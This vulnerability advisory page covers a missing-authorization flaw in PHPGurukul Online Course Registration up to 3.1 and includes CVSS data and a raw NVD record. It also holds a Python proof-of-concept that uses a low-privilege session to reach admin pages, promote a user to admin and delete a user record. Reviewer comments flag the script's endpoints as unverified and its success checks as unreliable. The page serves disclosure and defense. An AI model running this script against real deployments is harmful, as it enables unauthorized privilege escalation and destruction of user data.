Security Vulnerability Report
CVE-2025-15406 CVSS 6.3 MEDIUM

CVE-2025-15406

Published: 2026-01-01 17:15:43
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in PHPGurukul Online Course Registration up to version 3.1. The affected function has not been identified. The manipulation results in missing authorization. The attack can be carried out remotely. A public exploit is available and may be used.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Note: the score and vector shown here are the Secondary CVSS 3.1 assessment. The raw record below also carries a Primary CVSS 3.1 assessment of 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and a CVSS 4.0 base score of 2.1 LOW, so triage should not rely on the headline 6.3 alone.

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:online_course_registration:*:*:*:*:*:*:*:* - VULNERABLE
PHPGurukul Online Course Registration <= 3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys  # NOTE(review): imported but never used in this script

# CVE-2025-15406 PoC - Broken Access Control in PHPGurukul Online Course Registration
# Target: PHPGurukul Online Course Registration <= 3.1
# Vulnerability: Missing Authorization / IDOR
#
# NOTE(review): the advisory text on this page says the affected function is
# unknown; the endpoints and parameter names used below (admin/index.php,
# admin/user-management.php, userid/action/role/email) are not given anywhere
# in the advisory or the raw NVD record and should be treated as illustrative,
# unverified against the product.
# NOTE(review): this listing was recovered from a single collapsed line; the
# nesting of steps 2 and 3 under the step-1 status check is inferred.

# Placeholder values; nothing on this page identifies a real host or session.
TARGET_URL = "http://target-website.com"
ATTACKER_TOKEN = "attacker_session_token"
TARGET_USER_ID = 1  # Target admin user ID


def exploit_unauthorized_access():
    """
    This PoC demonstrates the broken access control vulnerability.
    An authenticated low-privilege user can access admin functions.

    Reviewer notes (defensive reading of this script):

    * Every "success" branch below keys only on an HTTP 200. A login form,
      a redirect target or a generic error page served with 200 would pass
      the same test, so the printed "[+]" lines are not reliable confirmation
      of a bypass and should not be used as triage evidence on their own.
    * Step 3 is destructive: it attempts to delete a user record (id=2).
      That is not appropriate in a proof of concept run against any system
      whose data matters, even with authorization to test.
    * The underlying weakness (CWE-862 / CWE-863 per the raw record on this
      page) is a missing server-side role check on admin endpoints; the fix
      is to enforce the check on every admin request, not only on the menu
      page.
    * Detection: if these paths exist in a deployment, a non-admin session
      requesting /admin/ resources would show up in the web server access
      logs; alerting on that pattern is a reasonable compensating control
      while the application is patched.
    """
    # Reuses a low-privilege session cookie rather than admin credentials —
    # that is the whole point of the test: PR:L in the CVSS vector.
    headers = {
        'Cookie': f'PHPSESSID={ATTACKER_TOKEN}',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Step 1: Access admin panel without proper authorization
    admin_panel_url = f"{TARGET_URL}/admin/index.php"
    response = requests.get(admin_panel_url, headers=headers)

    # NOTE(review): 200 alone does not prove access; see docstring.
    if response.status_code == 200:
        print("[+] Successfully accessed admin panel!")

        # Step 2: Modify user data (IDOR vulnerability)
        modify_url = f"{TARGET_URL}/admin/user-management.php"
        payload = {
            'userid': TARGET_USER_ID,
            'action': 'modify',
            'role': 'admin',
            'email': '[email protected]'
        }
        response = requests.post(modify_url, data=payload, headers=headers)

        if response.status_code == 200:
            print("[+] Successfully modified user data without proper authorization!")

        # Step 3: Access/delete other user records
        # NOTE(review): destructive action — deletes a record, does not
        # merely read it; see docstring.
        delete_url = f"{TARGET_URL}/admin/user-management.php?action=delete&id=2"
        response = requests.get(delete_url, headers=headers)

        if response.status_code == 200:
            print("[+] Successfully deleted user record - Broken Access Control confirmed!")


if __name__ == "__main__":
    print("CVE-2025-15406 - PHPGurukul Online Course Registration Authorization Bypass")
    exploit_unauthorized_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15406", "sourceIdentifier": "[email protected]", "published": "2026-01-01T17:15:42.753", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in PHPGurukul Online Course Registration up to 3.1. This affects an unknown function. This manipulation causes missing authorization. Remote exploitation of the attack is possible. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:online_course_registration:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.1", "matchCriteriaId": "C1AC601F-C851-49CE-B60E-B8A662293ED3"}]}]}], 
"references": [{"url": "https://github.com/rsecroot/Online-Course-Registration/blob/main/Broken%20Access%20Control.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.339326", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339326", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.728354", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}